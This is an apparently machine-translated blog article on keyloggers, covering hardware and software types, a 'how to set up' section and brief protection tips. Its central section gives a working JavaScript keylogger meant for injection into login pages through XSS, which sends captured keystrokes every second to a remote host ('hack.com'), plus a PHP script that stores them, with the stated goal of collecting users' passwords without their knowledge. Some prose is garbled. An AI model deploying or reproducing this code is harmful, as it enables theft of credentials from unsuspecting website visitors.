Keyloggers: functioning , use and protection ~ DepoTech

A keylogger is a malicious program loaded in the memory of your computer that will grab everything you type on the keyboard: passwords, bank details, etc ... An attacker can then find there bearing earths and various logins and passwords Password of your computer.

Some keyloggers can record URLs visited, emails sent or viewed, open files, screen catches or create a video retracing all computer activity.

In this article we will see how keyloggers, how to set up a keylogger written in JavaScript and how to protect themselves?

The operation of keyloggers

A keylogger can be hardware or software. A hardware keylogger is a device that can be attached to the keyboard, cable or computer system block.

They are small, connect between the PS2 port of the PC and the keyboard connector. They are cheap, we find for sale everywhere and they are undetectable by the best free and paid antivirus. In short, the ideal unless the user often look behind his PC to check.

A keylogger software is a specially developed program to track keystrokes and transmit this information to a file.

Read: HOW TO HACK FIREFOX TO BECOME KEYLOGGER

keyloggers are installed :
when opening a file attached to a message;
to open a file in a shared directory on a P2P network;
using a script on a Web page that exploits the features of a browser allowing the program to run automatically when a user accesses the page;
etc.
They exist several techniques for the construction keyloggers popular software:

Trap system for the communication of a keystroke (installed using WinAPI function SetWindowsHook messages sent by the window procedure, programmed in C or Java);
Cyclical motion of the keyboard (using the WinAPI function Get (Async) KeyState, GetKeyboardState; most often programmed in Visual Basic, rarely in Borland Delphi);
Using a filter driver (requires special knowledge, programmed in C)

How to set up a keylogger Javascript?

I chose the use of JavaScript for multiple reasons. Thus, if it is discovered XSS in a website, it will be fairly easy to inject the snippet of code on a login page for example. This will collect all the logins / passwords of users without their knowledge.

An example of a keylogger written in JavaScript:

var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://hack.com/keylogger.php?c='+keys;
keys = '';
}, 1000);
</script>

Read: HOW TO HACK FIREFOX TO BECOME KEYLOGGER

Here JavaScript script recover whatever is typed (onkeypress) function in a variable called key. Besides this, the setInterval function waits a second before sending the data to a remote server (pirate server).
On the remote server, you will find a script similar to this one, which will feature the reception of data sent by the keylogger:

<?php
if(!empty($_GET['c'])) {
$f=fopen("logkey.txt","a+");
fwrite($f,$_GET['c']);
fclose($f);
}
?>

You have to inject the first script in a site with XSS.

How to protect from keyloggers?

Keyloggers are very dangerous because it is very difficult to monitor by antivirus or the task manager.

However, there is a free software that encrypts KeyScrambler what you type on the keyboard directly in the driver on your keyboard, preventing malicious software to retrieve your personal information. This gives you protection against both known and unknown keyloggers.

As for me, I suggest a less practical solution but to counter most keyloggers whatever their type (this is obviously not 100% foolproof as any software).
This is the virtual keyboard Microsoft!

Just click on Start / Run and type the following command: osk.exe

This application behaves exactly like a keyboard to write except that you click on the button with your mouse.

Read: HOW TO HACK FIREFOX TO BECOME KEYLOGGER

Remember that the best support for this blog is to love and share our articles!

For more news, thank you for subscribe to the blog newsletter to its RSS feed. Please also have a look at Twitter, Google+ or Facebook for other news.